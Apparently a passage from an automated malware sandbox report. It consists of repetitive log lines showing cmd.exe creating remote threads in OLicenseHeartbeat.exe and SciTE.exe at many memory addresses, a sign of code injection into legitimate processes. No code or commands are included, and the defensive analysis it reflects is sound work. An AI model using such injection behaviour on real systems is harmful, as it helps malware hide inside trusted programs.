            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 6B60000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 6BA0000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 6BE0000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 6C20000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 6C60000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 6CA0000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 6CE0000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 6D20000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 6D60000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 6DA0000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 6DE0000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 6E20000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 6E60000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 6EA0000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 6EE0000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 6F20000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 6F60000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 6FA0000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 6FE0000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 7020000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 7060000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 70A0000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 70E0000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 7120000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 7160000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 71A0000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 71E0000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 7220000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 7260000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 72A0000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 72E0000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 7320000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 7360000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 73A0000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 73E0000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 7420000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 7460000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 74A0000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 74E0000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 7520000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 7560000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 75A0000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 75E0000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 7620000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 7660000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 76A0000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 76E0000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 7720000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 7760000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 77A0000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 77E0000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 7810000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 7990000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 79C0000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 7B40000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 7B80000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 7BC0000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 7C00000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 7C40000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 7C80000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 7CC0000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 7D00000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 7D30000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 7EB0000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 7EF0000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 7F30000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 7F70000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 7FB0000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 7FF0000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 8020000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 1F0000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 7F0000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: BA0000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: BE0000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: C20000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: C60000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: CA0000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 2490000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 24D0000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 2510000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 2550000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 25B0000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 25F0000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 2630000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 2670000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 26B0000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 26F0000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 2730000Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 2770000
Source: C:\Windows\SysWOW64\cmd.exe Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 27B0000
Source: C:\Windows\SysWOW64\cmd.exe Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 27F0000
Source: C:\Windows\SysWOW64\cmd.exe Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 2830000
Source: C:\Windows\SysWOW64\cmd.exe Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 2870000
Source: C:\Windows\SysWOW64\cmd.exe Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 28B0000
Source: C:\Windows\SysWOW64\cmd.exe Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 28F0000
Source: C:\Windows\SysWOW64\cmd.exe Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 2930000
Source: C:\Windows\SysWOW64\cmd.exe Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 2970000
Source: C:\Windows\SysWOW64\cmd.exe Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 29B0000
Source: C:\Windows\SysWOW64\cmd.exe Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 29F0000
Source: C:\Windows\SysWOW64\cmd.exe Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 2A30000
Source: C:\Windows\SysWOW64\cmd.exe Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 2A70000
Source: C:\Windows\SysWOW64\cmd.exe Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 2AB0000
Source: C:\Windows\SysWOW64\cmd.exe Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 2AF0000
Source: C:\Windows\SysWOW64\cmd.exe Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 2B30000
Source: C:\Windows\SysWOW64\cmd.exe Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 2B70000
Source: C:\Windows\SysWOW64\cmd.exe Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 2BB0000
Source: C:\Windows\SysWOW64\cmd.exe Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 2BF0000
Source: C:\Windows\SysWOW64\cmd.exe Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 2C30000
Source: C:\Windows\SysWOW64\cmd.exe Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 2C70000
Source: C:\Windows\SysWOW64\cmd.exe Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 2CA0000
Source: C:\Windows\SysWOW64\cmd.exe Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 2E20000
Source: C:\Windows\SysWOW64\cmd.exe Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 2E60000
Source: C:\Windows\SysWOW64\cmd.exe Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 2EA0000
Source: C:\Windows\SysWOW64\cmd.exe Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 2EE0000
Source: C:\Windows\SysWOW64\cmd.exe Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 2F10000
Source: C:\Windows\SysWOW64\cmd.exe Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 3090000
Source: C:\Windows\SysWOW64\cmd.exe Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 30D0000
Source: C:\Windows\SysWOW64\cmd.exe Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 3110000
Source: C:\Windows\SysWOW64\cmd.exe Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 3140000
Source: C:\Windows\SysWOW64\cmd.exe Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 32C0000
Source: C:\Windows\SysWOW64\cmd.exe Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 3300000
Source: C:\Windows\SysWOW64\cmd.exe Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 3340000
Source: C:\Windows\SysWOW64\cmd.exe Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 3370000
Source: C:\Windows\SysWOW64\cmd.exe Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 34F0000
Source: C:\Windows\SysWOW64\cmd.exe Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 3530000
Source: C:\Windows\SysWOW64\cmd.exe Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 3570000
Source: C:\Windows\SysWOW64\cmd.exe Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 35B0000
Source: C:\Windows\SysWOW64\cmd.exe Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 35E0000
Source: C:\Windows\SysWOW64\cmd.exe Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 3760000
Source: C:\Windows\SysWOW64\cmd.exe Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 37A0000
Source: C:\Windows\SysWOW64\cmd.exe Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 37D0000
Source: C:\Windows\SysWOW64\cmd.exe Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 3950000
Source: C:\Windows\SysWOW64\cmd.exe Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 3990000
Source: C:\Windows\SysWOW64\cmd.exe Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 39D0000
Source: C:\Windows\SysWOW64\cmd.exe Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 3A10000
Source: C:\Windows\SysWOW64\cmd.exe Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 3A50000
Source: C:\Windows\SysWOW64\cmd.exe Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 3A90000
Source: C:\Windows\SysWOW64\cmd.exe Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 3AD0000
Source: C:\Windows\SysWOW64\cmd.exe Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 3B10000
Source: C:\Windows\SysWOW64\cmd.exe Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 3B50000
Source: C:\Windows\SysWOW64\cmd.exe Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 3B90000
Source: C:\Windows\SysWOW64\cmd.exe Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 3BD0000
Source: C:\Windows\SysWOW64\cmd.exe Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 3C10000
Source: C:\Windows\SysWOW64\cmd.exe Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 3C50000
Source: C:\Windows\SysWOW64\cmd.exe Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 3C90000
Source: C:\Windows\SysWOW64\cmd.exe Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 3CD0000
Source: C:\Windows\SysWOW64\cmd.exe Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 3D10000
Source: C:\Windows\SysWOW64\cmd.exe Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 3D50000
Source: C:\Windows\SysWOW64\cmd.exe Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 3D90000
Source: C:\Windows\SysWOW64\cmd.exe Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 3DD0000
Source: C:\Windows\SysWOW64\cmd.exe Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 3E10000
Source: C:\Windows\SysWOW64\cmd.exe Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 3E50000
Source: C:\Windows\SysWOW64\cmd.exe Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 3E90000
Source: C:\Windows\SysWOW64\cmd.exe Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 3ED0000
Source: C:\Windows\SysWOW64\cmd.exe Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 3F10000
Source: C:\Windows\SysWOW64\cmd.exe Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 3F50000
Source: C:\Windows\SysWOW64\cmd.exe Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 3F90000
Source: C:\Windows\SysWOW64\cmd.exe Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 3FD0000
Source: C:\Windows\SysWOW64\cmd.exe Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 4010000
Source: C:\Windows\SysWOW64\cmd.exe Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 4050000
Source: C:\Windows\SysWOW64\cmd.exe Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 4090000
Source: C:\Windows\SysWOW64\cmd.exe Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 40D0000
Source: C:\Windows\SysWOW64\cmd.exe Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 4110000
Source: C:\Windows\SysWOW64\cmd.exe Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 4150000
Source: C:\Windows\SysWOW64\cmd.exe Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 4190000
Source: C:\Windows\SysWOW64\cmd.exe Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 41D0000
Source: C:\Windows\SysWOW64\cmd.exe Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 4210000
Source: C:\Windows\SysWOW64\cmd.exe Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 4250000
Source: C:\Windows\SysWOW64\cmd.exe Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 4290000
Source: C:\Windows\SysWOW64\cmd.exe Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 42D0000
Source: C:\Windows\SysWOW64\cmd.exe Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 4310000
Source: C:\Windows\SysWOW64\cmd.exe Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 4350000
Source: C:\Windows\SysWOW64\cmd.exe Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 4390000
Source: C:\Windows\SysWOW64\cmd.exe Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 43D0000
Source: C:\Windows\SysWOW64\cmd.exe Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 4410000
Source: C:\Windows\SysWOW64\cmd.exe Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 4450000
Source: C:\Windows\SysWOW64\cmd.exe Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 4490000
Source: C:\Windows\SysWOW64\cmd.exe Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 44D0000
Source: C:\Windows\SysWOW64\cmd.exe Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 4510000
Source: C:\Windows\SysWOW64\cmd.exe Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 4550000
Source: C:\Windows\SysWOW64\cmd.exe Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 4590000
Source: C:\Windows\SysWOW64\cmd.exe Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 45D0000
Source: C:\Windows\SysWOW64\cmd.exe Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 4610000
Source: C:\Windows\SysWOW64\cmd.exe Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 4650000
Source: C:\Windows\SysWOW64\cmd.exe Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 4690000
Source: C:\Windows\SysWOW64\cmd.exe Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 46D0000
Source: C:\Windows\SysWOW64\cmd.exe Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 4710000
Source: C:\Windows\SysWOW64\cmd.exe Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 4750000
Source: C:\Windows\SysWOW64\cmd.exe Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 4790000
Source: C:\Windows\SysWOW64\cmd.exe Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 47D0000
Source: C:\Windows\SysWOW64\cmd.exe Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 4810000
Source: C:\Windows\SysWOW64\cmd.exe Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 4850000
Source: C:\Windows\SysWOW64\cmd.exe Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 4890000
Source: C:\Windows\SysWOW64\cmd.exe Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 48D0000
